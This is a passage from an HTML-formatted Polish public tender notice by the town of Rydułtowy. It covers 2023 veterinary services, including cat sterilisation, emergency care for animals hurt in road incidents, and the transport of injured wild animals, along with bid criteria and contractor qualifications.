um@rydultowy.pl.<br/> 8. W przypadku gdy po przeprowadzonym badaniu, o którym mowa w ust. 2 pkt 1 lekarz weterynarii stwierdzi, iż zwierzę nie może być dopuszczone do wykonania zabiegu, winien odmówić jego przeprowadzenia, a w przypadku stwierdzenia wystąpienia u zwierzęcia chorób lub innych czynników zagrażających życiu kota, dopuszcza się uśpienie kota<br/>i przekazanie zwłok do utylizacji . <br/> 9. W przypadku, gdy z przyczyn niezależnych od Wykonawcy, zwierzę nie przeżyje zabiegu, Wykonawca jest zobowiązany do poinformowania Zamawiającego (telefonicznie lub za pomocą środków komunikacji elektronicznej: um@rydultowy.pl) i przekazania zwłok do utylizacji . <br/> 10. Zwierzęta niezakwalifikowane do zabiegu podczas badania, o którym mowa w ust. 2 pkt 1, nie podlegają leczeniu i podlegają zwrotowi osobie, która je dostarczyła, po uprzednim poinformowaniu Zamawiającego (telefonicznie lub za pomocą środków komunikacji elektronicznej: um@rydultowy.pl).<br/> 11. W przypadku wykonania zabiegu sterylizacji/kastracji wskutek którego nastąpiło pogorszenie stanu zdrowia kota lub wystąpiły inne uboczne skutki, które nie ustępują<br/>w ciągu 2 tygodni, Wykonawca na własny koszt wykona badanie zwierzęcia oraz podejmie czynności w celu poprawy stanu zdrowia kota. <br/> 12. Wykonawca winien dysponować gabinetem zabiegowym, pomieszczeniami do okresowego przetrzymywania zwierząt, klatkami odpowiedniej wielkości o wymiarach umożliwiających utrzymanie zwierzęcia w humanitarnych warunkach, aparaturą i sprzętem niezbędnym do świadczenia usług weterynaryjnych, objętych przedmiotem zamówienia oraz zapewnić możliwość odizolowania zwierzęcia chorego. <br/> 13. Wykonawca ma obowiązek wykonywania zabiegów objętych przedmiotem zamówienia zgodnie z obowiązującymi przepisami prawa z zachowaniem standardów i dobrych praktyk weterynaryjnych, w sposób wykluczający cierpienie zwierząt. <br/> 14. Wykonawca jest zobowiązany do prowadzenia ewidencji zgłoszeń i wykonanych zabiegów.<br/> 15. Wykonawca ma obowiązek sporządzania sprawozdań z wykonanych zabiegów za dany miesiąc w terminie do 15 dni od zakończenia danego miesiąca wg wzoru stanowiącego załącznik do wzoru umowy. <br/> 16. Wykonawca zobowiązany jest do umożliwienia Zamawiającemu kompleksowej kontroli realizacji zamówienia, w tym wglądu do dokumentacji lekarskiej leczonych zwierząt, objętych umową, zgodnie z rozporządzenie Ministra Rolnictwa i Rozwoju Wsi z dnia 29 września 2011 r.<br/>w sprawie zakresu i sposobu prowadzenia dokumentacji lekarsko-weterynaryjnej i ewidencji leczenia zwierząt oraz wzorów tej dokumentacji i ewidencji (Dz. U. Nr 224, poz. 1347).<br/> 17. Zestawienie wykonanych zabiegów w latach 2019-2022 r.:<br/> 1) W 2019 r. przeprowadzono 5 zabiegów sterylizacji i 1 kastrację. <br/> 2) W 2020 r. przeprowadzono 6 zabiegów sterylizacji i 3 kastracje.<br/> 3) W 2021 r. przeprowadzono 9 zabiegów sterylizacji i 2 kastracje. <br/> 4) *Do czerwca 2022 r. przeprowadzono 5 zabiegów sterylizacji i 1 kastrację. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77500000-5 - Usługi hodowli zwierząt</p> <p class="mb-0">85210000-3 - Ośrodki pielęgnowania zwierząt domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowy opis kryteriów znajduje się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie personelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja przez Wykonawcę zadania własnego gminy na podstawie art. 11 a ust.2 pkt 6 ustawy z dnia 21 sierpnia 1997 r. o ochronie zwierząt w zakresie usypiania ślepych miotów. <br/> 2. Realizacja przedmiotu zamówienia obejmuje:<br/> 1) dojazd do miejsca przebywania ślepego miotu i wykonanie zabiegu usypiania ślepego miotu, przy zachowaniu humanitarnych zasad uśmiercania zwierząt, <br/> 2) utylizację zwierząt po dokonaniu zabiegu usypiania ślepego miotu.<br/> 3. Usługi, o których mowa w ust.1, będą świadczone przez Wykonawcę na podstawie zleceń telefonicznych lub ustnych dokonywanych przez pracownika Zamawiającego lub pracownika Straży Miejskiej w Rydułtowach. <br/> 4. Wykonawca jest zobowiązany do poinformowania Zamawiającego o zgłoszeniu dokonanym przez pracownika Straży Miejskiej w terminie do 2 dni roboczych od dnia jego dokonania pisemnie lub za pomocą środków komunikacji elektronicznej na adres: um@rydultowy.pl.<br/> 5. Wykonawca zobowiązany jest do umożliwienia Zamawiającemu kompleksowej kontroli realizacji zamówienia, w tym dostępu do dokumentacji medycznej.<br/> 6. W okresie od 2018 r. do I półrocza 2022 r. nie wykonano żadnych zabiegów usypiania ślepych miotów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77500000-5 - Usługi hodowli zwierząt</p> <p class="mb-0">85210000-3 - Ośrodki pielęgnowania zwierząt domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowy opis kryteriów znajduje się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie personelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja przez Wykonawcę zadania własnego gminy na podstawie art. 11 a ust. 2 pkt 8 ustawy z dnia 21 sierpnia 1997 r. o ochronie zwierząt w zakresie zapewnienia całodobowej opieki weterynaryjnej w przypadkach zdarzeń drogowych z udziałem zwierząt.<br/> 2. Realizacja przedmiotu zamówienia obejmuje:<br/> 1) niezwłoczny dojazd do miejsca zdarzenia drogowego z udziałem zwierząt na terenie Miasta Rydułtowy,<br/> 2) udzielenie pomocy medycznej zwierzęciu, które doznało obrażeń w wyniku zdarzenia drogowego na obszarze Miasta Rydułtowy, z zastrzeżeniem pkt 5,<br/> 3) przewóz zwierząt do lecznicy w celu wykonania zabiegów wymagających placówki stacjonarnej,<br/> 4) leczenie zwierząt przebywających w placówce stacjonarnej, w tym zapewnienia całodobowej opieki medycznej,<br/> 5) w przypadku konieczności, w celu zakończenia cierpień zwierzęcia bezzwłoczne uśmiercenie<br/>i przejęcie zwłok.<br/> 3. Usługa będąca przedmiotem zamówienia musi być wykonywana w wymiarze całodobowym,<br/>a Wykonawca musi zapewnić 24-godzinną (również w dni świąteczne) gotowość<br/>i opiekę weterynaryjną.<br/> 4. W tabeli przedstawiono liczbę zdarzeń drogowych z udziałem bezdomnych zwierząt w latach 2019– I półrocze 2022.<br/>2019, 2020, 202, I półrocze 2022<br/>Liczba zdarzeń drogowych z udziałem bezdomnych zwierząt<br/>11, 5, 1, 1<br/> 5. Usługi, o których mowa w ust.1, będą świadczone przez Wykonawcę na podstawie zleceń telefonicznych lub ustnych dokonywanych przez pracownika Zamawiającego lub pracownika Straży Miejskiej.<br/> 6. W zleceniu, o którym mowa w ust.5, zostanie określony rodzaj zwierzęcia, które uległo obrażeniom w zdarzeniu drogowym oraz miejsce, w którym to zwierzę się znajduje.<br/> 7. Wykonawca jest zobowiązany do poinformowania Zamawiającego o zgłoszeniu dokonanym przez pracownika Straży Miejskiej w terminie do 2 dni roboczych od dnia jego dokonania pisemnie lub za pomocą środków komunikacji elektronicznej na adres: um@rydultowy.pl <br/> 8. W zgłoszeniu, o którym mowa w ust. 7, Wykonawca winien wskazać Zgłaszającego oraz określić: rodzaj zwierzęcia, które zostało poszkodowane w wypadku drogowym, miejsce<br/>i termin wystąpienia zdarzenia, rodzaj usług wykonanych w związku z zdarzeniem wraz<br/>z podanymi lekami, przewidywany czas pobytu w lecznicy (jeśli zachodzi taka potrzeba).<br/> 9. Wykonawca ma obowiązek wykonywania zabiegów objętych przedmiotem zamówienia zgodnie z obowiązującymi przepisami prawa z zachowaniem standardów i dobrych praktyk weterynaryjnych, w sposób wykluczający cierpienie zwierząt. <br/> 10. Wykonawca ma obowiązek prowadzenia ewidencji zgłaszanych zwierząt i wykonanych usług, która winna obejmować w szczególności: wskazanie Zgłaszającego, określenie: rodzaju zwierzęcia, które zostało poszkodowane w wypadku drogowym, miejsca i terminu wystąpienia zdarzenia, rodzaju usług wykonanych w związku z zdarzeniem wraz z podanymi lekami oraz czasu pobytu w lecznicy.<br/> 11. Wykonawca ma obowiązek sporządzania sprawozdań z wykonanych zabiegów oraz dołączania dokumentów potwierdzających wykonanie zabiegów (RTG, USG, wyniki badań morfologicznych itp.) za dany miesiąc w terminie do 15 dni od zakończenia danego miesiąca wg wzoru stanowiącego załącznik do umowy. <br/> 12. Wykonawca zobowiązany jest do umożliwienia Zamawiającemu kompleksowej kontroli realizacji zamówienia, w tym wglądu do dokumentacji lekarskiej leczonych zwierząt, objętych umową, zgodnie z rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z dnia 29 września 2011 r. w sprawie zakresu i sposobu prowadzenia dokumentacji lekarsko-weterynaryjnej i ewidencji leczenia zwierząt oraz wzorów tej dokumentacji i ewidencji (Dz. U. Nr 224, poz. 1347).<br/> 13. O zakończeniu pobytu w lecznicy Wykonawca niezwłocznie informuje Zamawiającego.<br/> 14. Zamawiający zastrzega sobie prawo odstąpienia od uporczywego leczenia zwierzęcia poszkodowanego i kontynuowania terapii w przypadku złego rokowania, potwierdzonego opinią lekarza weterynarii działającego na zlecenie Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77500000-5 - Usługi hodowli zwierząt</p> <p class="mb-0">85210000-3 - Ośrodki pielęgnowania zwierząt domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowy opis kryteriów znajduje się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie personelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wyłapywanie i transport zwierząt wolno żyjących (dzikich) poszkodowanych na terenie miasta Rydułtowy.<br/> 2. Realizacja przedmiotu zamówienia obejmuje:<br/> 1) całodobową gotowość do podjęcia interwencji w miejscu zdarzenia,<br/> 2) przybycie na miejsce zdarzenia w czasie nie dłuższym niż 1 godzina od chwili otrzymania wezwania, z zastrzeżeniem pkt 3,<br/> 3) niezwłoczny dojazd do miejsca zdarzenia drogowego z udziałem wolno żyjących (dzikich) zwierząt,<br/> 4) interwencyjne wyłapywanie i przewóz zabłąkanych i rannych zwierząt przy użyciu urządzeń (chwytaków, klatek) i środków transportu tj. samochodów przystosowanych do przewozu zwierząt w sposób humanitarny, niepowodujący cierpień zwierząt oraz zgodnie z wymogami określonymi w ustawie z dnia 21 sierpnia 1997 r. o ochronie zwierząt (t.j. Dz. U. z 2022 r. poz. 572),<br/> 5) zapewnienie transportu zwierząt wolno żyjących (dzikich) zgodnie z przepisami rozporządzenia WE w sprawie ochrony zwierząt podczas transportu i związanych z tym działań oraz zmieniające dyrektywy 64/432/EWG i 93/119/WE oraz rozporządzenie (WE)<br/>nr 1255/97, <br/> 6) wyłapywanie zabłąkanych zwierząt wolno żyjących (dzikich), przewożenie<br/>ich i wypuszczanie do naturalnego środowiska, <br/> 7) zapewnienie nadzoru lekarza weterynarii w celu podejmowania w każdym czasie wszelkich niezbędnych czynności w celu zabezpieczenia zwierzęcia przed zagrożeniem dla jego życia, oceny stanu zdrowia zwierzęcia oraz dalszego trybu postępowania,<br/> 8) transport zwierząt wolno żyjących (dzikich), poszkodowanych (np. rannych, osieroconych) do ośrodka rehabilitacji zwierząt, z którym Wykonawca ma podpisaną umowę<br/>(w przypadku stwierdzenia takiej potrzeby przez lekarza weterynarii), przy czym minimalny zakres działalności ośrodka musi dotyczyć możliwości przyjęcia ptaków<br/>i ssaków.<br/> 3. Usługi, o których mowa w ust.1, będą świadczone przez Wykonawcę na podstawie zleceń telefonicznych lub ustnych dokonywanych przez:<br/> 1) pracownika Zamawiającego,<br/> 2) pracownika Straży Miejskiej w Rydułtowach.<br/> 4. Wykonawca jest zobowiązany do poinformowania Zamawiającego o zgłoszeniu, o którym mowa w ust.3 pkt 2 w terminie do 2 dni roboczych od dnia dokonania jego zgłoszenia <br/> 5. Liczba zdarzeń na terenie miasta z udziałem wolno żyjących (dzikich) zwierząt jest określona w SWZ.<br/>6. Szacuje się, iż w okresie realizacji zamówienia wystąpi 26 interwencji z udziałem wolno żyjących (dzikich) zwierząt, w tym 1 wyjazd nieskuteczny oraz 5 interwencji związanych z przekazaniem zwierząt do ośrodka rehabilitacji zwierząt. <br/> 7. Wykonawca ma obowiązek prowadzenia ewidencji zgłaszanych zwierząt i wykonanych usług, która winna obejmować w szczególności: wskazanie Zgłaszającego, określenie rodzaju zwierzęcia, miejsca i wystąpienia terminu zdarzenia, wskazanie sposobu postępowania z wolno żyjącym (dzikim ) zwierzęciem.<br/> 8. Wykonawca ma obowiązek sporządzania sprawozdań z wykonanych usług za dany miesiąc<br/>w terminie do 15 dni od zakończenia danego miesiąca wg wzoru stanowiącego załącznik do wzoru umowy.<br/> 9. Wykonawca zobowiązany jest na żądanie Zamawiającego do przekazywania informacji<br/>o losie zwierząt przekazanych do ośrodka rehabilitacji zwierząt.<br/> 10. Zamawiający zobowiązany jest do umożliwienia Zamawiającemu kompleksowej kontroli realizacji zamówienia, w tym do przekazywania informacji o losie zwierząt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90720000-0 - Ochrona środowiska</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77500000-5 - Usługi hodowli zwierząt</p> <p class="mb-0">85200000-1 - Usługi weterynaryjne</p> <p class="mb-0">85210000-3 - Ośrodki pielęgnowania zwierząt domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowy opis kryteriów znajduje się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji (czas przyjazdu na miejsce zdarzenia od momentu otrzymania zgłoszenia z wyłączeniem zdarzeń drogowych z udziałem dzikich zwierząt)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: <br/><br/>Dla Pakietu nr I<br/> 1. Zdolności do występowania w obrocie gospodarczym: <br/> Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/> 2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> a) wykażą, iż posiadają zezwolenie na prowadzenie działalności w zakresie ochrony nad bezdomnymi zwierzętami, o którym mowa w przepisie art. 7 ust. 1 pkt 3 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2022 r. poz. 1297<br/>z późn. zm.),<br/> b) wykażą, iż posiadają zezwolenie na prowadzenie działalności w zakresie prowadzenia schronisk dla bezdomnych zwierząt, o którym mowa w przepisie art. 7 ust. 1 pkt 4 ustawy<br/>z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2022 r. poz. 1297 z późn. zm.),<br/> 3. Sytuacji ekonomicznej lub finansowej:<br/> Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/> 4. Zdolności technicznej lub zawodowej:<br/> Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą się dysponowaniem:<br/> 1) następującymi urządzeniami niezbędnymi do wykonania przedmiotu zamówienia,tj: 5 smyczami, <br/> 3 chwytakami, 2 siatkami i 2 klatkami pułapkami,<br/> 2) co najmniej jednym środkiem transportu przystosowanym do przewozu i transportu zwierząt.<br/> <br/>Dla Pakietów nr II-IV<br/> 1. Zdolności do występowania w obrocie gospodarczym: <br/> Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/> 2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: prowadzą zakład leczniczy dla zwierząt wpisany do ewidencji zakładów leczniczych prowadzonej przez właściwą ze względu na siedzibę zakładu leczniczego okręgową radę lekarsko weterynaryjną zgodnie z przepisami ustawy z dnia 18 grudnia 2003 r.<br/>o zakładach leczniczych dla zwierząt (t. j. Dz. U. z 2019 r. poz. 24), <br/> 3. Sytuacji ekonomicznej lub finansowej:<br/> Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/> 4. Zdolności technicznej lub zawodowej:<br/> Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą się dysponowaniem co najmniej <br/> jedną osobą posiadającą prawo do wykonywania zawodu lekarza weterynarii wpisanego do rejestru <br/> członków okręgowej izby lekarsko – weterynaryjnej.<br/><br/>Dla Pakietu nr VI<br/> 1. Zdolności do występowania w obrocie gospodarczym: <br/> Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/> 2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą iż posiadają decyzję Powiatowego Lekarza Weterynarii na wykonywanie transportu zwierząt trwającego do 8 godzin.<br/> 3. Sytuacji ekonomicznej lub finansowej:<br/> Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/> 4. Zdolności technicznej lub zawodowej:<br/> a) Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą iż dysponują co najmniej następującymi urządzeniami niezbędnymi do wykonania przedmiotu zamówienia,tj: dysponują co najmniej 2 chwytakami i 2 klatkami.<br/>b) Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą się dysponowaniem co najmniej jedną osobą posiadającą prawo do wykonywania zawodu lekarza weterynarii wpisanego do rejestru członków okręgowej izby lekarsko – weterynaryjnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie Wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z<br/>postępowania wskazanych przez Zamawiającego (art. 108 ust. 1 ustawy Pzp i art. 7 ust. 1 ustawy o szczególnych rozwiązaniach<br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3. Wykaz podmiotowych środków dowodowych składanych w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, w zakresie wskazanym w rozdziale V SWZ <br/> 1) Pakiet I pod nazwą: „Zapewnienie bezdomnym zwierzętom miejsca w schronisku dla zwierząt, odławianie bezdomnych zwierząt oraz obligatoryjna sterylizacja i kastracja”:<br/> a) zezwolenie na prowadzenie działalności w zakresie prowadzenia schronisk dla bezdomnych zwierząt, o którym mowa w przepisie art. 7 ust. 1 pkt 3 ustawy z dnia 13 września 1996 r.<br/>o utrzymaniu czystości i porządku w gminach (t. j. Dz. U. z 2022 r. poz. 1297 z późn. zm.),<br/> b) zezwolenie na prowadzenie działalności w zakresie prowadzenia schronisk dla bezdomnych zwierząt, o którym mowa w przepisie art. 7 ust. 1 pkt 4 ustawy z dnia 13 września 1996 r.<br/>o utrzymaniu czystości i porządku w gminach (t. j. Dz. U. z 2022 r. poz. 1297 z późn. zm.) <br/> Zamawiający samodzielnie pozyska ww. zezwolenie – w związku z powyższym Wykonawca nie ma <br/> obowiązku przekazywać go Zamawiającemu.<br/> c) wykaz narzędzi dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz informacją o podstawie do dysponowania tymi zasobami,<br/> 2) Pakiet II -IV<br/> a) wpis do ewidencji zakładów leczniczych prowadzonej przez radę lekarsko-weterynaryjną,<br/> Zamawiający samodzielnie pozyska wpis do ww. ewidencji – w związku z powyższym Wykonawca nie ma obowiązku przekazywać go Zamawiającemu. <br/> b) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.<br/><br/> 5) Pakiet VI pod nazwą: „Wyłapywanie i transport zwierząt wolno żyjących (dzikich) poszkodowanych na terenie miasta Rydułtowy”<br/> <br/> a) wykaz narzędzi dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz<br/> informacją o podstawie do dysponowania tymi zasobami,<br/> b) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na<br/> temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania <br/> zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie<br/> do dysponowania tymi osobami,<br/> c) decyzja Powiatowego Lekarza Weterynarii na wykonywanie transportu zwierząt trwającego <br/> do 8 godzin.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz(e) oferty – w zależności od liczby pakietów, na które Wykonawca składa ofertę, <br/> 2) kalkulację(e) ceny oferty- jeżeli Wykonawca składa ofertę na Pakiet I i/lub II i/lub IV,/i/lub VI.<br/> 3) zobowiązania podmiotów trzecich do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia – dołączyć jeżeli Wykonawca zamierza spełnianie warunku udziału w postępowaniu dotyczącego zdolności technicznych lub zawodowych wykazać wykorzystując zasoby podmiotów trzecich,<br/> 4) oświadczenie, z którego wynika które usługi wykonają poszczególni Wykonawcy występujący wspólnie (uwaga dotyczy tylko konsorcjum spółki cywilnej)- załącznik nr 6,<br/> 5) pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, albo do reprezentowania w postępowaniu i zawarcia umowy, z którego wynika zakres, tj. określenie do jakich czynności uprawniony jest pełnomocnik – dołączyć, o ile dotyczy,<br/> 6) umowa na odbiór i utylizację zwłok padłych zwierząt (pakiet I-IV),<br/> 7) umowa z ośrodkiem rehabilitacji zwierząt lub inny dokument potwierdzający możliwość przekazania zwierząt wolno żyjących (dzikich) do ośrodka rehabilitacji zwierząt (dotyczy pakietu VI). <h2 class="bg-light p-3 